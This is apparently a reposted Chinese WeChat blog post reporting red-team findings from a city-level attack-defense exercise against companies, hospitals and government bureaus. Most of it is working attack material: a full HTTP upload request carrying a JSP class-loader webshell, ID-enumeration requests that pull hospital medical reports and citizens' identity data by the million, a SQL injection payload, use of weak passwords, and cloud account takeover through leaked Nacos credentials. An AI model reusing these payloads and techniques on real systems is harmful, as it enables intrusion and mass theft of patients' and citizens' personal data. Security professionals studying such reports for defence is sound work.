正文部分
上上个月参加了某个地级市的攻防演练,将小部分报告合并分享出来(想要抽奖的师傅直接拉到文末就行啦~~)(打码打到我想死~)
某公司未授权+文件上传getshell
http://xxx.xxx.xxx:9081
文件上传getshell
POST /api/portal/v1/file/upload?lang=zh_CN HTTP/
1.1
Host:
xxx.xxx.xxx
:
9081
Content-Length:
1230
Accept: application/json, text/plain, *
/*
Tenant-Code: WS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryytBWAvbx7URctPS3
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: _cmslang=zh_CN; sajssdk_2015_cross_new_user=1; sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_search_keyword%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%2C%22%24latest_referrer%22%3A%22url%E7%9A%84domain%E8%A7%A3%E6%9E%90%E5%A4%B1%E8%B4%A5%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMThmY2NiMGQyOTFhY2MtMGQ4Y2QxNGI4MDJjZjMtNGM2NTdiNTgtMTM5NTM5Ni0xOGZjY2IwZDI5MjE4NTQifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%2218fccb0d291acc-0d8cd14b802cf3-4c657b58-1395396-18fccb0d2921854%22%7D
Connection: close
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="file"; filename="11.jsp"
Content-Type: image/png
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
------WebKitFormBoundaryytBWAvbx7URctPS3
Content-Disposition: form-data; name="type"
NEWS
------WebKitFormBoundaryytBWAvbx7URctPS3--
https://xxx.xxx.xxx/static_resources/draft/news/xxxx/xxxxx.jsp
密码:passwd
某医院百万用户泄露
体检报告查看
POST /app-api/examination/getInspectionList HTTP/1.1
Host: xxx.xxx.xxx:18145
Content-Length: 70
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Authorization: Bearer b78b2e2f-b162-4528-ba26-38ff5da78f87
Apptoken: 5891187f4fe91f58bb0fdcf8216254a6d71d43bbe198e86f92a70648f2bc55c9e8cc344fa9b4fa0126c2b78d9891aa71d276a1b8ec0c48b0f20c452f5d129da2f31a907799852ae1cca039a8277d19d4339f19e02116487d737686472fe212bc810e9e61fcde11436e0494459e46bd59cc84fe78097e94f631a694bbb0340a4a0f14f2fefbf4e4b1f8065b28647cec0ff0178d1b4ea44f444bda289f84d1b53cb5a8dc0ed7531dd5c327e4dea7ecaa853eed0acc41652d2205228d6c12a108bb
Content-Type: application/json
Accept: */*
Origin:
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
{"queryType":8,"queryValue":"6363","month":"2024-05","needPage":false}
遍历queryValue即可从0到3000000都不间断有报告 这是2225636
这是808
用户订单信息查看
POST /app-manage/inHospital/getInpatientPayList HTTP/1.1
Host: xxx.xxx.xxx:18145
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
VERSION: test
Content-Length: 46
{"pageSize": 100,"needPage": true,"pageNo": 1}
只需要把pagesize修改为10000即可
某医院百万五要素泄露
通过小程序获取到站点
遍历uid可以获取到五要素 身份证,姓名,电话,地址,出生日期
POST /xxxx/xxxx/xxxlativeList HTTP/1.1
Host: xxx.xxx.xxx
Content-Length:24
Xweb_xhr:1
Orgcode:18477
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/116.0.0.0Safari/537.36MicroMessenger/7.0.20.1781(0x6700143B)NetType/WIFI MiniProgramEnv/WindowsWindowsWechat/WMPF WindowsWechat(0x6309071d) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Accept:*/*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
hCode=18477&uid=39701982
遍历uid即可获取百万敏感信息, 大约500个跑出来250条数据,目前应该总共有400w的uid,大约有200w的五要素
部分uid会泄露全家,父母,自己,配偶的五要素等敏感信息
通过这里获取的信息,还可以获取到用户的: 住院信息,拍片信息,付款信息,发票信息,挂号信息,手术信息
某局数据库权限+getshell
nacos 泄露postgre数据库连接密码
获取数据库权限
尝试连接之后直接进行命令执行
rabbitmq
某局所有用户接管+SQL注入获取oracle26个数据库40个数据库用户以及DBA权限
也是通过小程序获取站点
获取所有公司管理者用户名和明文密码,以及管理者的手机号身份证等信息 随便点击一个企业
自动发送数据包
泄露信息如下
泄露该公司管理员的账号密码,尝试登陆可以登录成功 登录网址:https:/xxx.xxx.xxx/
最终泄露的信息如下 1161个公司的账号和密码 登陆公司账号之后可以获得相关人的身份证、手机号、邮箱
获得账号密码之后可以进行登陆
点击进入系统
可以获取大量视频监控权限查看到实时监控,以及各大地方监控的token
所有账号弱口令,通过后台获取到电话号,密码为a123456
SQL注入
数据包
POST /cxmStatic/dashboard/1/list HTTP/1.1
Host: xxx.xxx.xxx
Cookie:
Content-Length: 14
Accept-Encoding: gzip, deflate, br
Apptype: WEIXIN_MINI
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxNDUwNjc6V0VJWElOX01JTkkiLCJleHAiOjE3MTU5NjQwNTEsImlhdCI6MTcxNTk0OTY1MX0.qUHwdpcRccIg4Nct5i58qPxZ6OiV9PfBhHilWhyIG_0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) XWEB/9129
Content-Type: application/x-www-form-urlencoded
Charset: UTF-8
Xweb_xhr: 1
X-Requested-With: XMLHttpRequest
Appid: wx67d2416db3cb5b69
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
Connection: close
zoneId=511827*
数据库如下总计26个
数据库的用户名如下总计40个数据库用户
其中一个数据库256个表
数据库中有三要素信息
某医院水平越权查看20w+患者体检报告
数据包如下,token随便用一个自己生成的token即可 生成token 发送如下数据包即可获取token
POST /sj-bifrost-web/report/generateToken HTTP/2
Host: xxx.xxx.xxx
Content-Length: 37
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineeIcno":"123"}
POST /sj-bifrost-web/report/detail HTTP/
2
Host: xxx.xxx.xxx
Content-Length:
101
Accept: application/json, text/plain, *
/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Language: zh-CN,zh;q=0.9
{"token":"F83BA1402B2A8AABB3D042115500D571D3A1685910B84F00B907689BA4ED0547","serviceNumber":"199245"}
遍历serviceNumber即可查看其他的报告,但是身份证还是跟token相关,报告仅仅与serviceNumber相关,遍历serviceNumber从0到30w
这里id从0遍历到了20w都有数据
某学院附属医院未授权SQL注入获取58387条公民信息
通过数据包获取token
POST /sj-bifrost-web/report/generateToken HTTP/
2
Host: xxx.xxx.xxx
Content-Length:
31
Accept: application/json, text/plain, *
/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Content-Type: application/json
Origin:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
{"examineePhone":"' or '1'='1"}
利用token获取三要素信息
GET /sj-bifrost-web/report/reportOrderList?token=
8
ED9D6B38CDBF617724060160F957101311CFF26B28F48D18CFFDCA22C3D7A62 HTTP/
2
Host: xxx.xxx.xxx
Accept: application/json, text/plain, *
/*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63090a13) XWEB/9129 Flue
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer:
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
某工会云接管getshell
nacos中泄露了ak导致云接管
aliyun:
textAudit:
accessKeyId: xxxxxxxxx
secret: xxxxxxxxxxxxx
endpoint: xxxxxxxxxxxxxx
获取阿里云账号密码
成功登陆 获取一台阿里云服务器权限
可以直接在阿里云进行终端控制rce,getshell
同时该账户旗下有大量的资源 如下图: 多个域名控制权 服务器控制权 多个储存控制权 网关控制权 短信服务控制权 视频直播控制权 DNS服务器控制权 51个资源
某工会nacos存在身份验证绕过漏洞+ 数据库权限
http://xxx.xxx.xxx:28848/nacos/
### redis服务
redisInfo:
host:xxxxxxxxxx
port:xxxxxxxx
password: xxxxxxxxxxx
database:0
### mysql服务
custom:
mysql:
master:
connect:xxxxxxxx
username: xxxxxx
password:xxxxxxxx
slave:
connect:xxxxxxxxx/xxxxxx
username: xxxxxxxxxx
password:xxxxxxx
dxb:
httpUrl: xxxxxxxxxx
dxbUsername: xxxx
dxbPassword: xxxxx
rabbitmq:
host: xxxxxxx
port: xxxxxx
username: xxxxxxx
password: xxxxxxxxxxxx
泄露微信apikey和密钥
获取ak:https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=xxxxx&secret=xxxxxxxxxxxxxxx
https://api.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ak 可以利用该ak管理公众号
原文始发于微信公众号(渗透安全团队):地市护网爽拿上万分,一次看个爽(文末抽奖)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论